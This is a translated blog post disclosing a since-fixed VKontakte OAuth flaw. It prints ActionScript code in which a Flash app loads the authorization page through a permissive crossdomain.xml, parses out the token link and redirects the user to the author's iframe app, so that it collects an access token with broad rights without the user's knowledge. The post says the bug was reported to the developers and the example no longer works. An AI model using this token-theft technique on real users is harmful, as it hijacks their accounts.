We get access to Vkontakte Api methods without the knowledge of the user


This vulnerability was found by me about two months ago, or even more.
Then the information was sent to the developers, and they successfully fixed it.
As it seemed to me at that time.

It soon became clear that they did not fix it at all, but simply limited access to messages that I drew the attention of developers at that time.

The process of gaining access, I will try to describe in sufficient detail under the cut.


Actually, the idea that it is possible to access api without the knowledge of the user appeared almost immediately as soon as I started working with methods for Standalone applications.
At that moment, VKontakte already used oauth authorization.

There was nothing particularly tricky, just oauth authorization was on the same domain with api 2.0, and, accordingly, with the crossdomain.xml file , which allows you to execute requests from any server.

Without hesitation, I began to write an implementation.


I immediately warn readers about two things:
  • My way may seem a little strange.
  • My code is rather cattle, but, unfortunately, I do not know how otherwise.

My insidious tricky plan implied that the user will be directed to a flash application that will fire an authorization page, and then spars the authorization link.


Point one - flash application.

Since flash drives can execute free cross-domain requests wherever there is proper crossdomain.xml - this was the only way to accurately get an authorization link.

The flash drive code is straightforward, and perhaps this is the most difficult part, at least for me, because I almost don't know ActionScript.

import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.events.Event;
var auth_page = new URLLoader();
this.addEventListener( Event.ADDED_TO_STAGE, onAddedToStage ); 
function onAddedToStage(e: Event): void { 
auth_page.addEventListener(Event.COMPLETE, auth_load);
//Получаем страницу авторизации 
auth_page.load(new URLRequest('http://api.vkontakte.ru/oauth/authorize?client_id=2725857&scope=offline,ads,notifications,groups,wall,questions,offers,pages,notes,docs,video,audio,photos,friends,notifi&redirect_uri=http://api.vk.com/blank.html&display=page&response_type=token'));
function auth_load(e:Event):void {
 var wrapper: Object = Object(parent.parent);
 var auth_str = auth_page.data;
 //редиректим пользователя на iframe приложение, а в хеше указываем отпарсеный урл
 wrapper.external.navigateToURL(new URLRequest('http://vkontakte.ru/app2725881#'+auth_str.toString().substr(auth_str.indexOf("location.href")+17, 162)));

There is one little trick.
It’s just that a flash application cannot redirect due to browser security policies.
But VK has, or rather was, now it has been removed from the docks, a special method for redirecting a user to a page inside VKontakte.
This did not become a particular problem, however, because there are iframe applications that can redirect wherever they want.

Point two - iframe application.

In the iframe application, we need to redirect the user to the specified url, making a couple of replacements.

This can be done.
On the hi.php page we get access_token, with rights to all methods except messages.

A good example, you can see here .
Thanks for attention.
UPD: The
fix is ​​made, though very smartly.
The example is no longer valid.

Also popular now: